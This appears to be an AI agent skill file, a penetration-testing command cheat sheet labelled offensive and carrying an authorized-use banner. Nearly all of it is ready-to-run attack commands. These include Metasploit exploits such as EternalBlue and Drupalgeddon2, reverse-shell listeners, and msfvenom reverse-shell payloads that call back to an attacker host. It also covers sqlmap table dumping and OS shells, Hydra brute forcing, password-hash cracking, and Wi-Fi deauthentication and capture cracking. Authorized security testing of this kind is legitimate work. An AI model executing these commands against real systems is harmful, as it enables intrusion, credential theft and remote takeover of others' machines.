| name | pentest-commands |
| description | Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments. |
| risk | offensive |
| source | community |
| author | zebbern |
| date_added | 2026-02-27 |
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
Pentest Commands
Purpose
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
Core Workflow
1. Nmap Commands
Host Discovery:
nmap -sP 192.168.1.0/24
nmap -sL 192.168.1.0/24
nmap -sn 192.168.1.0/24
Port Scanning:
nmap -sS 192.168.1.1
nmap -sT 192.168.1.1
nmap -sU 192.168.1.1
nmap -p- 192.168.1.1
nmap -p 22,80,443 192.168.1.1
Service Detection:
nmap -sV 192.168.1.1
nmap -O 192.168.1.1
nmap -A 192.168.1.1
nmap -Pn 192.168.1.1
NSE Scripts:
nmap --script vuln 192.168.1.1
nmap --script smb-enum-shares -p 445 192.168.1.1
nmap --script http-enum -p 80 192.168.1.1
nmap --script smb-vuln-ms17-010 192.168.1.1
nmap --script smb-vuln-ms08-067 192.168.1.1
nmap --script ssh-brute -p 22 192.168.1.1
nmap --script ftp-anon 192.168.1.1
nmap --script dns-brute 192.168.1.1
nmap -p80 --script http-methods 192.168.1.1
nmap -p80 --script http-headers 192.168.1.1
nmap --script http-sql-injection -p 80 192.168.1.1
Advanced Scans:
nmap -sX 192.168.1.1
nmap -sA 192.168.1.1
nmap -sW 192.168.1.1
nmap --traceroute 192.168.1.1
2. Metasploit Commands
Basic Usage:
msfconsole
search type:exploit name:smb
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST 192.168.1.1
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
Common Exploits:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
Scanners:
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
Handler Setup:
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
Payload Generation (msfvenom):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
3. Nikto Commands
nikto -h http://192.168.1.1
nikto -h http://192.168.1.1 -C all
nikto -h http://192.168.1.1 -output report.html
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
nikto -h http://192.168.1.1 -Format msf+
nikto -h http://192.168.1.1 -Tuning 1
4. SQLMap Commands
sqlmap -u "http://192.168.1.1/page?id=1"
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
5. Hydra Commands
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
hydra -l admin -P passwords.txt smb://192.168.1.1
hydra -l admin -P passwords.txt rdp://192.168.1.1
hydra -l root -P passwords.txt mysql://192.168.1.1
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
6. John the Ripper Commands
john hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --show
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
zip2john file.zip > zip_hash.txt
john zip_hash.txt
7. Aircrack-ng Commands
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
8. Wireshark/Tshark Commands
tshark -i eth0 -w capture.pcap
tshark -r capture.pcap
tshark -r capture.pcap -Y "http"
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
Quick Reference
Common Port Scans
nmap -F 192.168.1.1
nmap -sV -sC -A -p- 192.168.1.1
nmap -sV -T4 192.168.1.1
Password Hash Types
| Mode | Type |
|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting affects tools
Examples
Example 1: Quick Vulnerability Scan
nmap -sV --script vuln 192.168.1.1
Example 2: Web App Test
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
Troubleshooting
| Issue | Solution |
|---|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
When to Use
This skill is applicable to execute the workflow or actions described in the overview.
